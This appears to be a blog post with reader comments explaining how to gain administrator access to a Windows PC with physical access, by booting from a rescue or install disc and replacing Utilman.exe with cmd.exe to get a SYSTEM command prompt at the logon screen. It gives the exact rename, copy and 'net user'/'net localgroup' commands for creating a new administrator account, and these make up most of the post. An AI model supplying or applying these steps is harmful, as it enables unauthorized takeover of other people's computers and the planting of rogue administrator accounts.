To get access to a Windows PC as an Administrator user, there is a very brute security hole which you can use. The only thing is: You need physical access to the machine.
The procedure is as follows:
- use a Linux Boot-CD (e.g. BackTrack 4 or the System Rescue CD)
or a Windows Installation disc (of the same version as installed!)- Linux Boot-CD: (there’s also a nice screencast over at offensive-security.com)
- if not already, mount the Windows partition
- go to
Windows/system32/ - rename the file
Utilman.exetoUtilman.exe.bakand copycmd.exetoUtilman.exe:# mv Utilman.exe Utilman.exe.bak# cp cmd.exe Utilman.exe - reboot the machine into Windows
- Windows Boot-CD:
- select your Windows version to “repair”
- if it asks whether you want to do use System Rescue, say “No”
- after it has given up trying to repair your system, click the small link Advanced Recovery Options
- select Command Prompt
- now go to your Windows drive, for me it was
D: - do a
cd \Windows\system32 - now rename the file
Utilman.exetoUtilman.exe.bakand copycmd.exetoUtilman.exe:D:\>ren Utilman.exe Utilman.exe.bakD:\>copy cmd.exe Utilman.exe - reboot the machine into the regular Windows
- Linux Boot-CD: (there’s also a nice screencast over at offensive-security.com)
- on the Logon screen of Windows, press Win+U – this would normally open the Utility Manager
aka.Utilman.exe, but now, the Command Prompt should show up - you have
SYSTEMrights, so you can easily add a new Administrator user:C:\>net user BadGuy GoodPassword /addC:\>net localgroup Administrators BadGuy /add
This will add the userBadGuywith the passwordGoodPasswordand make him a member of the Administrators group. - Login with the newly created user
BadGuy - Remember to delete the fake
Utilman.exeand renameUtilman.exe.bakback toUtilman.exe
Guter Tip, hat mir 2h Arbeit mit XP neu aufsetzen erspart 🙂
hi, access denied when D:>copy cmd.exe Utilman.exe
Start the Command Prompt with Administrator permissions: Start → Programs → Command Prompt → RIGHT CLICK → “Run As Administrator”